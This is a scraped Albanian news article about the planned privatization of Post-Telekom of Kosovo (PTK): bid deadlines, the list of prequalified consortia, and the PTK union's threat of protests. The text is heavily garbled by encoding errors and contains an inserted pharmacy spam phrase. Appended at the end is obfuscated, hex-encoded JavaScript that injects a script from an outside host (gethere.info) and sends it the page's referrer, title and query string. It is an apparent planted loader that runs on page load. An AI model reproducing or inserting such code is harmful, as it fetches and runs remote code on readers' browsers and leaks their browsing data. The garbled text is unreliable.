PTK_442236032

MA� 3 dhjetor ofertat financiare pA�r PTK-nA�

Tre dhjetori i kA�tij viti A�shtA� dita e fundit kur kompanitA� e parakualifikuara duhet ta��i dorA�zojnA� ofertat financiare pA�r privatizimin e kompanisA� mA� profitabile nA� vend, PostA�-Telekomin e KosovA�s (PTK). ampicillin cvs over the counter.

KA�shtu bA�jnA� tA� ditur pA�r gazetA�n a�?ZA�ria�? burime tA� sigurta brenda MinistrisA� sA� Zhvillimit Ekonomik, e cila drejtohet nga Besim Beqaj.Sipas kA�tyre burimeve, pas dorA�zimit tA� kA�tyre ofertave do ta��i rekomandohet QeverisA� pA�r kompaninA� fituese, e cila mA� pas duhet tA� vendosA� pA�r blerA�sin e PTK-sA�.

Pas shpalljes sA� fituesit nga Qeveria, do tA� jetA� edhe afati i caktuar ligjor, kur kompanitA� pjesA�marrA�se mund tA� bA�jnA� ankesa lidhur me fituesin e tenderit pA�r telekomin e KosovA�s.a�?NA�se nuk ka ankesa mund tA� procedohet shpejt me fituesina�?, bA�n tA� ditur burimi.

Nga ana tjetA�r, sindikalistA�t e PTK-sA� janA� ankuar se nuk kanA� asnjA� informacion lidhur me procesin e privatizimit tA� ndA�rmarrjes sA� tyre.a�?PunonjA�sit e PTK-sA�, institucionet e KosovA�s, por edhe tA� gjithA� qytetarA�t nuk kanA� asnjA� informacion tA� plotA� se A�ka A�shtA� duke ndodhur mA� kA�tA� procesa�?, ka theksuar kryetari i FederatA�s Sindikale tA� PTK-sA�, Milazim Alshiqi, gjatA� njA� konference pA�r media tA� mbajtur tA� enjten.

Alshiqi ka shtuar se tA� gjitha kompanitA� e parakualifikuara nuk janA� kompani tA� cilat kanA� veprimtari tA� veten kryesore ofrimin e shA�rbimeve tA� telefonisA� fikse dhe mobile, por janA� konsorciume qA� merren me shumA� veprimtari dhe mA� sA� paku me shA�rbime telekomunikuese. SindikalistA�t kanA� paralajmA�ruar se do ta��i pA�rdorin tA� gjitha format ligjore pA�r ta penguar privatizimin e PTK-sA�, duke mos pA�rjashtuar protesta masive dhe greva.
Komisioni Qeveritar pA�r Privatizim muaj mA� parA� ka parakualifikuar kA�to kompani pA�r blerjen e 75 pA�r qind tA� aksioneve tA� PTK-sA�: Albright Capital Management LLC nA� bashkA�punim me Portugal Telecom, Columbia Capital nA� konsorcium me ACP Axos Capital Gmbh, nA� bashkA�punim me British Telecom – Poloni (nA� pronA�si tA� British Telecom), M1 International Limited, Turkcell, Twelve HORNBEAMS nA� konsorcium me Avicenna Capital LLC dhe nA� bashkA�punim me Sofrecom (pjesA� e France Telecom).var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}